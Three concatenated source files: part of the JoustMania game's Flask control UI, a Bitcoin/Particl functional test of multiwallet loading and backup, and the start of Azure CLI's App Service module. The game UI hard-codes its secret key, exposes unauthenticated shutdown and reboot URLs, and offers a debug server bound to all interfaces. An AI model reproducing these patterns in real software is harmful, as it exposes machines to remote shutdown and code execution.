    play_audio = BooleanField('Play audio')
    # NOTE(review): with coerce=bool, submitted values are coerced via
    # bool(str) — only the empty string ('Dark') coerces to False; confirm
    # this is the intended mapping.
    red_on_kill = SelectField('Kill notification',choices=[(True,'Red'),('','Dark')],coerce=bool)
    sensitivity = SelectField('Move sensitivity',choices=[(0,'Ultra High'),(1,'High'),(2,'Medium'),(3,'Low'),(4,'Ultra Low')],coerce=int)
    # Games selectable for random mode (Random itself and JoustTeams excluded).
    mode_options = [ game for game in common.Games if game not in [common.Games.Random, common.Games.JoustTeams]]
    random_modes = MultiCheckboxField('Random Modes',choices=[(game.name, game.pretty_name) for game in mode_options])
    color_lock = BooleanField('Lock team colors')
    color_choices = [(color.name,color.name) for color in colors.team_color_list]
    # 9 selects = 2-team + 3-team + 4-team locked colour slots.
    color_lock_choices = FieldList(SelectField('',choices=color_choices,coerce=str),min_entries=9)
    random_teams = BooleanField('Randomize teams each round')
class WebUI():
    """Flask web front-end for JoustMania.

    Exposes HTTP endpoints for game control (start/kill/change mode),
    settings, battery status and power management. Talks to the game process
    through `command_queue` and shares state via the multiprocessing
    namespace `ns`.
    """
    def __init__(self, command_queue=None, ns=None):
        """Bug fix: the original declared `command_queue=Queue()`, a mutable
        default evaluated once at class-definition time, so every instance
        constructed without an explicit queue shared the same Queue. A fresh
        Queue is now created per instance when none is supplied (same
        observable behaviour for all callers that pass a queue)."""
        self.app = Flask(__name__)
        self.app.secret_key="MAGFest is a donut"
        self.command_queue = command_queue if command_queue is not None else Queue()
        if ns == None:
            # Stand-alone/debug mode: build a namespace with sane defaults.
            self.ns = Manager().Namespace()
            self.ns.status = dict()
            self.ns.settings = {
                'sensitivity':1,
                'red_on_kill':False,
                'color_lock_choices':{
                    2: ['Magenta','Green'],
                    3: ['Orange','Turquoise','Purple'],
                    4: ['Yellow','Green','Blue','Purple']
                }}
            self.ns.battery_status = dict()
        else:
            self.ns = ns
        # Route table (decorators can't reference self at class scope).
        self.app.add_url_rule('/','index',self.index)
        self.app.add_url_rule('/changemode','change_mode',self.change_mode)
        self.app.add_url_rule('/startgame','start_game',self.start_game)
        self.app.add_url_rule('/killgame','kill_game',self.kill_game)
        self.app.add_url_rule('/updateStatus','update',self.update)
        self.app.add_url_rule('/battery','battery_status',self.battery_status)
        self.app.add_url_rule('/settings','settings',self.settings, methods=['GET','POST'])
        self.app.add_url_rule('/rand<num_teams>','randomize',self.randomize_teams)
        self.app.add_url_rule('/power','power',self.power)
        self.app.add_url_rule('/reboot8675309','reboot',self.reboot)
        self.app.add_url_rule('/shutdown8675309','shutdown',self.shutdown)
        self.app.add_url_rule('/shutdown','shutdown_lastscreen',self.shutdown_lastscreen)
    def web_loop(self):
        """Serve on all interfaces, port 80 (production mode)."""
        self.app.run(host='0.0.0.0', port=80, debug=False)
    def web_loop_with_debug(self):
        """Serve with Flask debug/reloader enabled."""
        self.app.run(host='0.0.0.0', port=80, debug=True)
    def index(self):
        """GET / — main control page."""
        return render_template('joustmania.html')
    def update(self):
        """GET /updateStatus — current game status as JSON."""
        return json.dumps(self.ns.status)
    def change_mode(self):
        """GET /changemode — ask the game process to cycle game modes."""
        self.command_queue.put({'command': 'changemode'})
        return "{'status':'OK'}"
    def start_game(self):
        """GET /startgame — ask the game process to start a game."""
        self.command_queue.put({'command': 'startgame'})
        return "{'status':'OK'}"
    def kill_game(self):
        """GET /killgame — ask the game process to abort the current game."""
        self.command_queue.put({'command': 'killgame'})
        return "{'status':'OK'}"
    def battery_status(self):
        """GET /battery — controller battery levels page."""
        return render_template('battery.html',ns=self.ns,levels=common.battery_levels)
    def power(self):
        """GET /power — reboot/shutdown confirmation page."""
        return render_template('power.html')
    def shutdown(self):
        """GET /shutdown8675309 — schedule a system shutdown in a child
        process, then redirect so the trigger URL stays concealed."""
        Process(target=self.shutdown_proc).start()
        return redirect(url_for('shutdown_lastscreen'))
    def shutdown_proc(self):
        # Delay so the HTTP response gets out before the OS goes down.
        sleep(2)
        system('shutdown now')
    def shutdown_lastscreen(self):
        """GET /shutdown — static goodbye page shown while powering off."""
        return render_template('shutdown.html')
    def reboot(self):
        """GET /reboot8675309 — schedule a reboot and return to the index."""
        Process(target=self.reboot_proc).start()
        return redirect(url_for('index'))
    def reboot_proc(self):
        # Delay so the HTTP response gets out before the OS restarts.
        sleep(2)
        system('reboot now')
    def settings(self):
        """GET/POST /settings — show or update game settings."""
        if request.method == 'POST':
            new_settings = SettingsForm(request.form).data
            self.web_settings_update(new_settings)
            return redirect(url_for('settings'))
        else:
            # Flatten the per-team-size colour locks into the 9-entry FieldList.
            temp_colors = self.ns.settings['color_lock_choices']
            temp_colors = temp_colors[2] + temp_colors[3] + temp_colors[4]
            settingsForm = SettingsForm(
                sensitivity = self.ns.settings['sensitivity'],
                red_on_kill = self.ns.settings['red_on_kill'],
                color_lock_choices = temp_colors
            )
            return render_template('settings.html', form=settingsForm, settings=self.ns.settings)
    def web_settings_update(self,web_settings):
        """Validate and persist settings posted from the web form.

        Duplicate colours within a team-size group are rejected (that group
        keeps its previous colours); everything else is saved to the
        namespace and to the YAML settings file.
        """
        colors_are_good = True
        temp_colors = {
            2: web_settings['color_lock_choices'][0:2],
            3: web_settings['color_lock_choices'][2:5],
            4: web_settings['color_lock_choices'][5:9],
        }
        for key in temp_colors.keys():
            colorset = temp_colors[key]
            if len(colorset) != len(set(colorset)):
                temp_colors[key] = self.ns.settings['color_lock_choices'][key]
                colors_are_good = False
        temp_settings = self.ns.settings
        temp_settings.update(web_settings)
        temp_settings['color_lock_choices'] = temp_colors
        #secret setting, keep it True
        #temp_settings['enforce_minimum'] = 'enforce_minimum' in web_settings.keys()
        # Random mode with nothing selected would hang: default to JoustFFA.
        if temp_settings['random_modes'] == []:
            temp_settings['random_modes'] = [common.Games.JoustFFA.name]
        self.ns.settings = temp_settings
        with open(common.SETTINGSFILE,'w') as yaml_file:
            yaml.dump(self.ns.settings,yaml_file)
        if colors_are_good:
            flash('Settings updated!')
        else:
            flash('Duplicate color lock colors! Other settings saved.')
    def randomize_teams(self,num_teams):
        """GET /rand<n> — random team colours for n in {2, 3, 4} as JSON."""
        if num_teams not in '234':
            return "what are you doing here?"
        else:
            num_teams = int(num_teams)
            team_colors = colors.generate_team_colors(num_teams)
            team_colors = [color.name for color in team_colors]
            return str(team_colors).replace("'",'"')#JSON is dumb and demands double quotes
def start_web(command_queue, ns):
    """Process entry point: build the WebUI and serve it (blocking)."""
    webui = WebUI(command_queue,ns)
    webui.web_loop()
if __name__ == '__main__':
webui = WebUI()
webui.web_loop_with_debug()
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
    """Exercise multiwallet support on one node: creating, loading, unloading
    and backing up many wallets, including path/symlink/permission edge cases
    and concurrent loadwallet calls."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 2
        # Wallet churn below (many create/load/unload cycles) can be slow.
        self.rpc_timeout = 120
        self.extra_args = [["-nowallet"], []]

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def add_options(self, parser):
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )

    def run_test(self):
        node = self.nodes[0]

        # Path helpers rooted at node 0's datadir / wallet dir.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Resolve the on-disk data file for a wallet, whether it lives in
            # a per-wallet directory or as a bare file in the wallet dir.
            if name == self.default_wallet_name:
                return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })

        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)

        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))

        # Pathological symlinks listwalletdir must survive scanning past.
        os.symlink('..', wallet_dir('recursive_dir_symlink'))

        os.mkdir(wallet_dir('self_walletdat_symlink'))
        os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))

        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        # create another dummy wallet for use in testing backups later
        self.start_node(0)
        node.createwallet("empty")
        node.createwallet("plain")
        node.createwallet("created")
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_file("empty"), empty_wallet)
        shutil.rmtree(wallet_dir("empty"))
        empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
        os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
        shutil.rmtree(wallet_dir("created"))
        os.rename(wallet_file("plain"), wallet_dir("w8"))
        shutil.rmtree(wallet_dir("plain"))

        # restart node with a mix of wallet names:
        #   w1, w2, w3 - to verify new wallets created when non-existing paths specified
        #   w          - to verify wallet name matching works when one wallet path is prefix of another
        #   sub/w5     - to verify relative wallet path is created correctly
        #   extern/w6  - to verify absolute wallet path is created correctly
        #   w7_symlink - to verify symlinked wallet path is initialized correctly
        #   w8         - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
        #   ''         - to verify default wallet file is created correctly
        to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
        in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create]  # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
        to_create.append(os.path.join(self.options.tmpdir, 'extern/w6'))  # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
        to_load = [self.default_wallet_name]
        if not self.options.descriptors:
            to_load.append('w8')
        wallet_names = to_create + to_load  # Wallet names loaded in the wallet
        in_wallet_dir += to_load  # The loaded wallets are also in the wallet dir
        self.start_node(0)
        for wallet_name in to_create:
            self.nodes[0].createwallet(wallet_name)
        for wallet_name in to_load:
            self.nodes[0].loadwallet(wallet_name)

        # An unreadable directory must not abort the wallet-dir scan.
        os.mkdir(wallet_dir('no_access'))
        os.chmod(wallet_dir('no_access'), 0)
        try:
            with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
                walletlist = self.nodes[0].listwalletdir()['wallets']
        finally:
            # Need to ensure access is restored for cleanup
            os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))

        assert_equal(set(node.listwallets()), set(wallet_names))

        # should raise rpc error if wallet path can't be created
        err_code = -4 if self.options.descriptors else -1
        assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")

        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)

        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())

        # Duplicate -wallet arguments are deduplicated with a warning.
        self.start_node(0, ['-wallet=w1', '-wallet=w1'])
        self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')

        if not self.options.descriptors:
            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # should not initialize if one wallet is a copy of another
            shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
            in_wallet_dir.append('w8_copy')
            exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        # should not initialize if wallet file is a symlink
        os.symlink('w8', wallet_dir('w8_symlink'))
        self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)

        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")

        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0)
        self.nodes[0].createwallet("w4")
        self.nodes[0].createwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        node.generatetoaddress(nblocks=1, address=w5.getnewaddress())

        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
        self.nodes[0].loadwallet("w4")
        self.nodes[0].loadwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)

        # A second node must refuse to share a walletdir already in use.
        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
        self.nodes[0].createwallet(self.default_wallet_name)
        if self.options.descriptors:
            exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another particld?"
        else:
            exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        self.restart_node(0)
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")

        # check wallet names and balances
        node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)

        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)

        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)

        w1, w2, w3, w4, *_ = wallets
        node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)

        # Funds move between wallets on the same node like any other payment.
        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)

        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")

        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))

        self.log.info("Test dynamic wallet loading")

        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)

        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()

        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()

        self.log.info("Concurrent wallet loading")
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)

        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)

        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))

        # Fail to load if wallet doesn't exist
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')

        # Fail to load duplicate wallets
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another particld?", self.nodes[0].loadwallet, wallet_names[0])
        else:
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])

            # This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
            # Fail to load duplicate wallets by different ways (directory and filepath)
            path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')

            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # Fail to load if one wallet is a copy of another
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if wallet file is a symlink
            assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')

        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')

        self.log.info("Test dynamic wallet creation.")
        # Fail to create a wallet if it already exists.
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
        assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')

        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        in_wallet_dir.append('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')

        assert 'w9' in self.nodes[0].listwallets()

        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)

        assert new_wallet_name in self.nodes[0].listwallets()

        self.log.info("Test dynamic wallet unloading")

        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2"),
        assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1"),

        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()

        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)

        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            if os.path.exists(backup):
                os.unlink(backup)
            rpc.backupwallet(backup)
            self.nodes[0].unloadwallet(wallet_name)
            # Swap in an empty wallet file: the address must no longer be ours...
            shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            self.nodes[0].unloadwallet(wallet_name)
            # ...then restore the backup: the address is ours again.
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)

        # Test .walletlock file is closed
        self.start_node(1)
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
        else:
            assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
    # Standard functional-test entry point.
    MultiWalletTest().main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.util import get_az_user_agent, send_raw_request, get_file_json
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (InvalidArgumentValueError, MutuallyExclusiveArgumentError, ResourceNotFoundError,
RequiredArgumentMissingError, ValidationError, CLIInternalError,
UnclassifiedUserFault, AzureResponseError, AzureInternalError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_tier,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager, use_additional_properties, get_app_service_plan_from_webapp,
get_resource_if_exists)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_KEYS, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX,
FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH,
DOTNET_RUNTIME_NAME, NETCORE_RUNTIME_NAME, ASPDOTNET_RUNTIME_NAME, LINUX_OS_NAME,
WINDOWS_OS_NAME)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None,  # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None, assign_identities=None,
                  role='Contributor', scope=None, vnet=None, subnet=None):
    """Create (or re-create over an existing name) an App Service web app.

    Resolves the App Service plan, builds a SiteConfig appropriate for the
    plan's OS / container options, optionally wires up vnet integration,
    then issues the long-running create call and applies post-create steps
    (git deployment source, FTP URL, container settings, managed identity).
    Returns the created Site object.
    """
    from azure.mgmt.web.models import Site
    SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'NameValuePair')
    if deployment_source_url and deployment_local_git:
        raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')

    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    client = web_client_factory(cmd.cli_ctx)
    # `plan` may be either a full resource ID or a bare plan name in this group.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
    if not plan_info:
